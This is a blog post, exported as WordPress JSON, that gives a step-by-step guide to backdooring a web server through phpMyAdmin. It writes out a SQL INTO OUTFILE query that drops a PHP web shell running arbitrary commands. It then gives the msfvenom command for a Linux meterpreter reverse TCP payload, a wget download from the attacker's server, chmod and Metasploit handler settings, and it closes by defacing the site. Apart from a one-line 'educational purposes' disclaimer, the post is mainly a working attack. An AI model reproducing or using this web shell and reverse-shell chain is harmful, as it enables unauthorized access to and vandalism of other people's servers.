{"id":98,"date":"2018-12-16T07:28:21","date_gmt":"2018-12-16T07:28:21","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=98"},"modified":"2019-03-08T18:17:27","modified_gmt":"2019-03-08T18:17:27","slug":"backdoor-with-phpmyadmin","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/","title":{"rendered":"
Backdoor with phpMyAdmin<\/center>"},"content":{"rendered":"\n

\u201cScenario\u201d So, you found your\u201ctargets\u201d website, but you notice it isn\u2019t much you can work with here. Using a URL Fuzzer, you found a \u201cphpMyAdmin\u201d path and surprisingly the admin used a weak password (Or some other method).<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n

You\u2019re logged into phpMyAdmin with the administrator account, head over to the SQL Tab \u201cThis will let you run SQL query\/queries on the server\u201dand use this code \u201cOr any code of your choice!\u201d and press go.<\/p>\n\n\n\n

  • \"\"<\/figure><\/li>
  • \"\"<\/figure><\/li><\/ul>\n\n\n\n
    SELECT \"<?php echo '<pre>';echo shell_exec($_REQUEST['mrjsec']);echo '<\/pre>'; ?>\"\nINTO OUTFILE '\/var\/www\/html\/name.php'<\/code><\/pre>\n\n\n\n
    Now go to your .php file (URL Wise) in this scenario I have named it name.php<\/p>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    You won\u2019t see anything on this page \u201cthat\u2019s normal, were all empty inside!\u201d, Now here\u2019s the magic part. At the end of the .php URL path add this \u201c?mrjsec=*Your command here*, now you have a shell within the server, where you can call commands such as ls, whoami, rm, wget and so on etc.<\/p>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    And from here you can even deface the site if that\u2019s what you want. And that ends that!<\/p>\n\n\n\n
    Or maybe you want to go further and get a Metasploit reverse TCP shell on the system itself?<\/p>\n\n\n\n
    Now we’re taking! First, we need to identify what operating system is running could be Linux or windows. However, in this scenario it\u2019s Linux, and you can find this out by merely performing \u201c?mrjsec=uname – this return \u201cLinux4.4.0-140-generic x86_64 x86_64 x86_64 GNU\/Linux\u201d.<\/p>\n\n\n\n
    Now it\u2019s time to craft the Metasploit payload using msfvenom if you\u2019re unsure what payload you\nwould need just run \u201cmsfvenom –list\npayloads\u201d this will show all the available payloads, just pick the one you\nneed.<\/p>\n\n\n\n
    \u201cSince this scenario is basedaround Linux, I will keep it Linux based, just remember there are so many different opportunities. Always think outside the box!\u201d<\/p>\n\n\n\n
    Create the payload you need. <\/p>\n\n\n\n
    msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=.31 LPORT=5721 -f elf > file<\/code><\/pre>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    Now you will need to upload it somewhere that offers direct downloading, in this scenario the attacker has apache2 installed and will be hosting the file from their own server.<\/p>\n\n\n\n
    Go back to the target and using the first shell, we will use wget to get our shell onto the system. <\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Using the \u201cls\u201d command we can see the file is in place, now\nwe just need to make it executable simply by using chmod<\/p>\n\n\n\n
    name.php?mrjsec=chmod +x file<\/code><\/pre>\n\n\n\n
    Before we even run the file, let\u2019s make sure our Metasploit handler is running and configured correctly.<\/p>\n\n\n\n
    msfconsole<\/code><\/pre>\n\n\n\n
    use exploit\/multi\/handler<\/code><\/pre>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    And don\u2019t forget to set the Payload, LHOST and RHOST!<\/p>\n\n\n\n
    set payload linux\/x86\/meterpreter\/reverse_tcp<\/code><\/pre>\n\n\n\n
    set LHOST .31<\/code><\/pre>\n\n\n\n
    set LPORT 5721<\/code><\/pre>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    You can use \u201cshow options\u201d this will show you what settings\nare required for this payload (or any others.)<\/p>\n\n\n\n
    Now just run exploit, and we can leave it. Or if you wish to background it just\ndo exploit -j<\/p>\n\n\n\n
    Back onto the targets site, we just need to run the file. From the URL we import \u201c.\/file\u201d and that\u2019s it.<\/p>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    And if we head back toour Metasploit, we can see our file was a success, and we now have a better foothold within the system. What you do from here is your business.<\/p>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    But for me\u2026 I think a better-looking homepage is needed!<\/p>\n\n\n\n
    \"\"<\/figure><\/div>\n\n\n\n
    \u2026. Well, I think it\u2019s better anyway\u2026. <\/p>\n\n\n\n

    I hope you have enjoyed my little guide here, remember this guide won\u2019t work 100% So, play around with it, and always think outside the box.<\/p>\n\n\n\n
    Enjoy!
    -MrJSec \u2764
    \u201cMade for educational purposes Only.\u201d
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    \u201cScenario\u201d So, you found your\u201ctargets\u201d website, but you notice it isn\u2019t much you can work with here. Using a URL Fuzzer, you found a \u201cphpMyAdmin\u201d path and surprisingly the admin used a weak password (Or…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[18],"tags":[27,28,26,30,29],"class_list":["post-98","post","type-post","status-publish","format-standard","hentry","category-hacking-corner","tag-backdoor","tag-php","tag-phpmyadmin","tag-shell","tag-web"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-1A","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/98","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=98"}],"version-history":[{"count":14,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/98\/revisions"}],"predecessor-version":[{"id":132,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/98\/revisions\/132"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=98"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=98"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=98"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}